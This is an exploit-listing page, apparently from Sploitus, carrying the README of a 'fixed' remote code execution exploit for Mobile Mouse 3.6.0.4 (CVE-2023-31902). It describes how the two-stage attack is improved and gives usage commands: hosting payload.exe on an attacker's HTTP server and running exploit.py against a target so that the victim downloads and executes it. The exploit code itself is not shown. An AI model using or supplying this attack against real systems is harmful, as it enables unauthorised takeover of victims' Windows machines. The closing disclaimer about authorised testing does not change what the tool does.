Sploitus

Exploit for CVE-2023-31902

githubexploit Β· 2026-08-04

Exploit Code

README45 lines
## https://sploitus.com/exploit?id=47A0F073-6C19-5A3A-8E24-8051528F0FE6
# Mobile Mouse 3.6.0.4 RCE - Fix

A corrected version of the Mobile Mouse 3.6.0.4 remote code execution exploit published as [EDB-51010](https://www.exploit-db.com/exploits/51010).

## Vulnerability

- **CVE:** CVE-2023-31902
- **Affected version:** Mobile Mouse 3.6.0.4
- **Default port:** TCP/9099

## What Was Fixed

The original exploit successfully downloads the payload but may fail to execute it because both stages use the same TCP connection.

This version:

- Downloads the payload through the first session
- Waits for the download to complete
- Opens a fresh connection
- Repeats the Mobile Mouse handshake
- Executes the downloaded payload

It also uses `sendall()`, properly escaped Windows paths, socket timeouts, and basic error handling.

## Usage

Start an HTTP server in the payload directory:

```bash
python3 -m http.server 8080
````

Run the exploit:

```bash
python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe
```

## Disclaimer

This project is intended only for authorized security testing and educational research. Do not use it against systems without explicit permission.